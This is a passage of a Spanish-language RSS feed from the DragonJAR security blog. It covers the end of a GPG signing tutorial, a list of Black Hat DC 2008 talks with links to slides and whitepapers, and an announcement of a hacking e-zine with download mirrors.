class="aligncenter" src="http://seifreed.files.wordpress.com/2009/07/creando_llaves_4.png?w=411&amp;h=282" border="0" alt=" Firmando Documentos y Correos con GPG"  title="Firmando Documentos y Correos con GPG" /></p><p>Una vez haya acabado nos ha de salir un mensajito como este.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://seifreed.files.wordpress.com/2009/07/creando_llaves_5.png?w=409&amp;h=325" border="0" alt=" Firmando Documentos y Correos con GPG"  title="Firmando Documentos y Correos con GPG" /></p><p>Ahora viene un paso que también es muy importante.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://seifreed.files.wordpress.com/2009/07/creando_llaves_6.png?w=500&amp;h=142" border="0" alt=" Firmando Documentos y Correos con GPG"  title="Firmando Documentos y Correos con GPG" /></p><p>Los que nos recomienda el software es hacer un backup. Ya que si por algún motivo perdemos la clave o olvidamos el password. <strong>No podremos abrir ningún archivo si no conocemos la clave o disponemos de la firma correspondiente.</strong></p><p>Después de eso nos saldrá el gestor de claves. Nos tendría que salir la clave que acabamos de generar.</p><p><a
href="http://comunidad.dragonjar.org/f156/gpg-firmando-correos-y-documentos-7919/">Continua leyendo el articulo en el foro, realmente recomendado ==&gt; GPG, firmando correos y documentos&#8230;</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/bits-y-qubits-camino-de-la-criptografia-partei.xhtml" title="Bits y Qubits, El camino de la criptografía &#8211; Parte I">Bits y Qubits, El camino de la criptografía &#8211; Parte I</a></li><li><a
href="http://www.dragonjar.org/manual-de-truecrypt.xhtml" title="Manual de TrueCrypt">Manual de TrueCrypt</a></li><li><a
href="http://www.dragonjar.org/antes-y-despues-de-la-criptografia-de-clave-publica.xhtml" title="Antes y Después de la Criptografía de Clave Pública">Antes y Después de la Criptografía de Clave Pública</a></li><li><a
href="http://www.dragonjar.org/clavehotmail-com-cometiendo-delitos-desde-el-2007.xhtml" title="ClaveHotmail.com cometiendo delitos desde el 2007">ClaveHotmail.com cometiendo delitos desde el 2007</a></li><li><a
href="http://www.dragonjar.org/foca-herramienta-para-analisis-meta-datos.xhtml" title="FOCA &#8211; Herramienta para análisis de Meta Datos">FOCA &#8211; Herramienta para análisis de Meta Datos</a></li><li><a
href="http://www.dragonjar.org/como-recuperar-una-cuenta-de-twitter.xhtml" title="¿Cómo Recuperar una Cuenta de Twitter? ">¿Cómo Recuperar una Cuenta de Twitter? </a></li><li><a
href="http://www.dragonjar.org/como-recuperar-una-cuenta-de-facebook.xhtml" title="¿Cómo Recuperar una Cuenta de Facebook?">¿Cómo Recuperar una Cuenta de Facebook?</a></li><li><a
href="http://www.dragonjar.org/diccionarios-para-realizar-ataques-de-fuerza-bruta.xhtml" title="Diccionario claves WPA para Realizar Ataques de Fuerza Bruta">Diccionario claves WPA para Realizar Ataques de Fuerza Bruta</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/firmando-documentos-y-correos-con-gpg.xhtml/feed</wfw:commentRss> <slash:comments>4</slash:comments> </item> <item><title>Descarga las Presentaciones del BlackHat 2008</title><link>http://www.dragonjar.org/descarga-las-presentaciones-del-blackhat-2008.xhtml</link> <comments>http://www.dragonjar.org/descarga-las-presentaciones-del-blackhat-2008.xhtml#comments</comments> <pubDate>Thu, 06 Mar 2008 18:28:02 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Documentacion]]></category> <category><![CDATA[Eventos en seguridad]]></category> <category><![CDATA[Black Hat]]></category> <category><![CDATA[Documentos]]></category> <category><![CDATA[Presentaciones]]></category> <category><![CDATA[Videos]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=358</guid> <description><![CDATA[Ya han sido publicadas las presentaciones del Black Hat 2008 (uno de los más importantes eventos de seguridad informática), puedes acceder a ellos por medio de su pagina oficial o puedes descargarlos individualmente con los enlaces que te pongo a continuación: Birds of a Feather #1 &#8211; CyberCOPS (Not the TV series) Ovie Carroll, Jim [...]]]></description> <content:encoded><![CDATA[<p
style="text-align: center;"><img
src="http://farm3.static.flickr.com/2383/2315545136_cba5225175_o.jpg" alt="2315545136 cba5225175 o  Descarga las Presentaciones del BlackHat 2008 " width="314" height="223" title=" Descarga las Presentaciones del BlackHat 2008 " /></p><p>Ya han sido publicadas las <a
href="http://www.dragonjar.org/tag/presentaciones" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Presentaciones">presentaciones</a> del <a
href="http://www.dragonjar.org/tag/black-hat" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Black Hat">Black Hat</a> 2008 (uno de los más importantes eventos de <a
href="../">seguridad informática</a>), puedes acceder a ellos por medio de <a
href="http://www.blackhat.com/html/bh-dc-08/bh-dc-08-archives.html">su pagina oficial</a> o puedes descargarlos individualmente con los enlaces que te pongo a continuación:<span
id="more-358"></span></p><p><strong>Birds of a Feather #1 &#8211; CyberCOPS (Not the TV series)</strong><br
/> Ovie Carroll, Jim Christy, Andy Fried, Ken Privette, SA David Trosch<br
/> <strong> (no han publicado la info todavia)</strong></p><p><strong>Keynote &#8211; Quest for the Holy Grail</strong><br
/> Jerry Dixon, National Member Alliance’s Vice President for Government Relations, Infragard<br
/> <strong> (no han publicado la info todavia)</strong></p><p><strong>Birds of a Feather #2 &#8211; Cyber Commission Recommendations</strong><br
/> Jerry Dixon, Tom Kellerman, James Andrew Lewis, Amit Yoran<br
/> <strong> (no han publicado la info todavia)</strong></p><p><strong>Dynamic Taint Propagation: Finding Vulnerabilities Without Attacking</strong><br
/> Brian Chess, Chief Scientist, Fortify Software<br
/> Jacob West, Manager, Security Research Group, Fortify Software<strong><br
/> <a
href="http://www.blackhat.com/presentations/bh-dc-08/Chess-West/Presentation/bh-dc-08-chess-west.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>Botnet Population and Intelligence Gathering Techniques</strong><br
/> David Dagon, Georgia Tech<br
/> Christopher Davis, Damballa<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Dagon-Davis/Presentation/bh-dc-08-dagon-davis.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>Side Channel Analysis on Embedded Systems. Impact and Countermeasures</strong><br
/> Job De Haas, Riscure<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/DeHaas/Presentation/bh-dc-08-dehaas.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>Bad Sushi &#8211; Beating Phishers at Their Own Game</strong><br
/> Nitesh Dhanjani<br
/> Billy Rios, <a
href="http://www.dragonjar.org/tag/microsoft" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Microsoft">Microsoft</a><br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Dhanjani-Rios/Presentation/bh-dc-08-dhanjani-rios.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>Entertainment Talk &#8211; Social Engineering</strong><br
/> Peter Earnest<br
/> <strong> (no han publicado la info todavia)</strong></p><p><strong>IO in the Cyber Domain, Immunity Style</strong><br
/> Sinan Eren, VP of Research, Immunity<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Eren/Presentation/bh-dc-08-eren.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>Biometric and Token-Based Access Control Systems</strong><br
/> Zac Franken, Freelance Security Consultant<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Franken/Presentation/bh-dc-08-franken.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>Comments to Follow the Keynote</strong><br
/> Andy Fried, IRS<br
/> After Jerry Dixon’s keynote, Andy Fried will give more details about the latest phishing challenges related to IRS.<br
/> <strong> (no han publicado la info todavia)</strong></p><p><strong>Threats to the 2008 Presidential Election</strong><br
/> Oliver Friedrichs, Symantec Corporation<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Friedrichs/Whitepaper/bh-dc-08-friedrichs-WP.pdf">Descargar WithePaper</a></strong><br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Friedrichs/Presentation/bh-dc-08-friedrichs.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>Developments in Cisco IOS Forensics</strong><br
/> FX, Recurity Labs GmbH<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/FX/Whitepaper/bh-dc-08-fx-WP.pdf">Descargar WithePaper</a></strong></p><p><strong>Cracking GSM</strong><br
/> David Hulton, Steve Pico Computing, Inc.<br
/> <strong><a
href="http://www.blackhat.com/html/featured_media/bh08-002-Stream-1.mov">Descargar Video</a></strong><br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Steve-DHulton/Whitepaper/bh-dc-08-steve-dhulton-WP.pdf">Descargar WithePaper</a></strong><br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Steve-DHulton/Presentation/bh-dc-08-steve-dhulton.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong><a
href="http://www.dragonjar.org/tag/hacking" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Hacking">Hacking</a> VoIP through IPSec Tunnels</strong><br
/> Sachin Jogkelar, Sipera VIPER Lab<br
/> <strong> (no han publicado la info todavia)</strong></p><p><strong>A Picture’s Worth: Digital Image Analysis</strong><br
/> Dr. Neal Krawetz, Hacker Factor Solutions<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Krawetz/Whitepaper/bh-dc-08-krawetz-WP.pdf">Descargar WithePaper</a></strong><br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Krawetz/Presentation/bh-dc-08-krawetz.pdf">Descargar Diapositivas de esta Charla</a></strong><br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Krawetz/Extra/jpegquality.c">Herramientas Utilizadas</a></strong></p><p><strong>SCADA <a
href="../">Security</a></strong><br
/> Jason Larsen,IOActive, Inc.<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Larsen/Presentation/bh-dc-08-larsen.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>RFIDIOts!!! -Practical RFID hacking (without soldering irons)</strong><br
/> Adam Laurie, Freelance Security Consultant<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Laurie/Presentation/bh-dc-08-laurie.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>Oracle Security</strong><br
/> David Litchfield, NGS Software<br
/> <strong> (no han publicado la info todavia)</strong></p><p><strong>URI Use and Abuse</strong><br
/> Nathan McFeters, Ernst &amp; Young, LLP<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/McFeters-Rios-Carter/Whitepaper/bh-dc-mcfeters-rios-carter-WP.pdf">Descargar WithePaper</a></strong><br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/McFeters-Rios-Carter/Presentation/bh-dc-08-mcfeters-rios-carter.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>Analyzing an Unknown RF-Based Data Transmission</strong><br
/> (aka: Fun with 27Mhz wireless keyboards)<br
/> Max Moser, Dreamlab Technologies AG<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Moser/Whitepaper/bh-dc-08-moser-WP.pdf">Descargar WhitePaper</a></strong></p><p><strong>(un)Smashing the Stack: Overflows, Countermeasures, and the Real World</strong><br
/> Shawn Moyer, Agura Digital Security<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Moyer/Whitepaper/bh-dc-08-moyer-WP.pdf">Descargar WithePaper</a></strong><br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Moyer/Presentation/bh-dc-08-moyer.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>Exploiting Live Virtual Machine Migration</strong><br
/> Jon Oberheide, University of Michigan<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Oberheide/Whitepaper/bh-dc-08-oberheide-WP.pdf">Descargar WithePaper</a></strong><br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Oberheide/Presentation/bh-dc-08-oberheide.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>Scanning Applications 2.0 &#8211; Next Generation Scan, Attacks and Tools</strong><br
/> Sheeraj Shah, Blueinfy<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Shah/Presentation/bh-dc-08-shah.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>Security Failures in Secure Devices</strong><br
/> Christopher Tarnovsky, Flylogic Engineering, LLC.<br
/> <strong><a
href="http://www.blackhat.com/html/images/ppt.gif">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>Preparing for the Cross Site Request Forgery Defense</strong><br
/> Chuck Willis, Principal Consultant, MANDIANT<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Willis/Whitepaper/bh-dc-08-willis-WP.pdf">Descargar WithePaper</a></strong><br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Willis/Presentation/bh-dc-08-willis.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>DTRACE: The Reverse Engineer’s Unexpected Swiss Army Knife</strong><br
/> David Weston, Science Applications International Corporation (SAIC)<br
/> Tiller Beauchamp Science Applications International Corporation (SAIC)<br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Beauchamp-Weston/Whitepaper/bh-dc-08-beauchamp-weston-WP.pdf">Descargar WithePaper</a></strong><br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Beauchamp-Weston/Presentation/bh-dc-08-beauchamp-weston.pdf">Descargar Diapositivas de esta Charla</a></strong></p><p><strong>Classification and Detection of Application Backdoors</strong><br
/> Chris Wysopal, CTO, Veracode<br
/> <strong><a
href="http://www.blackhat.com/html/images/presentation.gif">Descargar WithePaper</a></strong><br
/> <strong><a
href="http://www.blackhat.com/presentations/bh-dc-08/Wysopal-Eng/Presentation/bh-dc-08-beauchamp-wysopal-eng.pdf">Descargar Diapositivas de esta Charla</a></strong></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/intypedia-enciclopedia-visual-de-la-seguridad-informatica.xhtml" title="IntyPedia &#8211; Enciclopedia visual de la Seguridad Informática">IntyPedia &#8211; Enciclopedia visual de la Seguridad Informática</a></li><li><a
href="http://www.dragonjar.org/curso-backtrack-5-en-espanol.xhtml" title="Backtrack 5 Tutorial / Curso en Español">Backtrack 5 Tutorial / Curso en Español</a></li><li><a
href="http://www.dragonjar.org/todas-las-charlas-de-seguridad-en-la-campus-party-colombia-2011-en-video.xhtml" title="Todas las charlas de Seguridad en la Campus Party Colombia 2011 en Video">Todas las charlas de Seguridad en la Campus Party Colombia 2011 en Video</a></li><li><a
href="http://www.dragonjar.org/foca-herramienta-para-analisis-meta-datos.xhtml" title="FOCA &#8211; Herramienta para análisis de Meta Datos">FOCA &#8211; Herramienta para análisis de Meta Datos</a></li><li><a
href="http://www.dragonjar.org/la-vision-del-futuro-de-intel-inc.xhtml" title="La Visión del Futuro de Intel 2007 &#8211; Hoy una realidad gracias a Steve Jobs">La Visión del Futuro de Intel 2007 &#8211; Hoy una realidad gracias a Steve Jobs</a></li><li><a
href="http://www.dragonjar.org/video-tutorial-de-armitage-y-metasploit.xhtml" title="Vídeo Tutorial de Armitage y Metasploit">Vídeo Tutorial de Armitage y Metasploit</a></li><li><a
href="http://www.dragonjar.org/podcast-y-video-podcast-de-seguridad-informatica-en-espanol.xhtml" title="Podcast y Video Podcast de Seguridad Informática en Español">Podcast y Video Podcast de Seguridad Informática en Español</a></li><li><a
href="http://www.dragonjar.org/como-descubrir-vulnerabilidades-y-escribir-exploits.xhtml" title="Cómo descubrir vulnerabilidades y escribir exploits">Cómo descubrir vulnerabilidades y escribir exploits</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/descarga-las-presentaciones-del-blackhat-2008.xhtml/feed</wfw:commentRss> <slash:comments>1</slash:comments> <enclosure
url="http://www.blackhat.com/html/featured_media/bh08-002-Stream-1.mov" length="0" type="video/quicktime" /> </item> <item><title>E-ZINE No Oficial de Elhacker.net No. 1</title><link>http://www.dragonjar.org/e-zine-no-oficial-de-elhackernet-no-1.xhtml</link> <comments>http://www.dragonjar.org/e-zine-no-oficial-de-elhackernet-no-1.xhtml#comments</comments> <pubDate>Thu, 03 May 2007 03:09:56 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Artículos sobre seguridad]]></category> <category><![CDATA[Documentacion]]></category> <category><![CDATA[General]]></category> <category><![CDATA[Variado]]></category> <category><![CDATA[Documentos]]></category> <category><![CDATA[Hacking]]></category> <category><![CDATA[Revista]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=566</guid> <description><![CDATA[Graphixx comparte con nosotros la  E-ZINE No Oficial elhacker.net Nº1, de la comunidad de &#8220;ElHacker.net&#8221; el contenido es el siguiente: WifiSlax Blind Connection-Reset Programación Shell Networking Inyección DLL Creando una Máquina Virtual Me niego a instalar el Vista Link de descarga Descargar Mirrors: http://d01.megashares.com/?d01=cb71a3f http://www.megaupload.com/?d=N90WAISU http://www.filefactory.com/file/e81ade/ 1178129520 También puede interesarte...Disponible Hack Hispano eZine Nº3Ezine Phrack [...]]]></description> <content:encoded><![CDATA[<p
style="text-align: center;"><img
class="aligncenter" src="http://img255.imageshack.us/img255/4986/portadarc9.jpg" border="0" alt="portadarc9 E ZINE No Oficial de Elhacker.net No. 1"  title="E ZINE No Oficial de Elhacker.net No. 1" /></p><p><strong><a
title="Ver perfil de Graphixx" href="http://foro.dragonjar.us/index.php?action=profile;u=11337" target="_blank">Graphixx</a> </strong>comparte con nosotros la  <a
href="http://foro.dragonjar.us/index.php?topic=23972.msg85720#msg85720" target="_blank">E-ZINE No Oficial elhacker.net Nº1</a>, de la comunidad de &#8220;ElHacker.net&#8221; el contenido es el siguiente:</p><p>WifiSlax<br
/> Blind Connection-Reset<br
/> Programación <a
href="http://www.dragonjar.org/tag/shell" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Shell">Shell</a><br
/> Networking<br
/> Inyección DLL<br
/> Creando una Máquina Virtual<br
/> Me niego a instalar el Vista</p><p><strong>Link de descarga</strong><br
/> <a
href="http://personal.telefonica.terra.es/web/alexb/e-zine/E-zine_No_Oficial_elhacker.net_N_1.rar" target="_blank">Descargar</a></p><p><strong>Mirrors:</strong><br
/> <a
href="http://d01.megashares.com/?d01=cb71a3f" target="_blank">http://d01.megashares.com/?d01=cb71a3f</a><br
/> <a
href="http://www.megaupload.com/?d=N90WAISU" target="_blank">http://www.megaupload.com/?d=N90WAISU</a><br
/> <a
href="http://www.filefactory.com/file/e81ade/" target="_blank">http://www.filefactory.com/file/e81ade/</a><br
/> 1178129520</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/disponible-hack-hispano-ezine-n3.xhtml" title="Disponible Hack Hispano eZine Nº3">Disponible Hack Hispano eZine Nº3</a></li><li><a
href="http://www.dragonjar.org/ezine-phrack-65.xhtml" title="Ezine Phrack # 65 ">Ezine Phrack # 65 </a></li><li><a
href="http://www.dragonjar.org/in-secure-magazine-numero-15-disponible-para-descarga.xhtml" title="(IN) SECURE Magazine número 15 disponible para descarga">(IN) SECURE Magazine número 15 disponible para descarga</a></li><li><a
href="http://www.dragonjar.org/revista-digital-hackmex-n1.xhtml" title="Revista digital Hackmex N°1">Revista digital Hackmex N°1</a></li><li><a
href="http://www.dragonjar.org/ezine-1-comunidad-dragonjar.xhtml" title="Ezine #1 BETA de La Comunidad DragonJAR">Ezine #1 BETA de La Comunidad DragonJAR</a></li><li><a
href="http://www.dragonjar.org/vuelve-a-la-vida-phrack.xhtml" title="Vuelve a la Vida Phrack">Vuelve a la Vida Phrack</a></li><li><a
href="http://www.dragonjar.org/todas-las-revistas-pc-actual-en-pdf.xhtml" title="Todas las Revistas PC Actual en PDF">Todas las Revistas PC Actual en PDF</a></li><li><a
href="http://www.dragonjar.org/thd-weekend-llega-a-ecuador.xhtml" title="THD&#8217; Weekend llega a Ecuador">THD&#8217; Weekend llega a Ecuador</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/e-zine-no-oficial-de-elhackernet-no-1.xhtml/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 22/82 queries in 0.057 seconds using disk: basic
Object Caching 2586/2691 objects using disk: basic

Served from: www.dragonjar.org @ 2012-02-11 23:25:32 -->
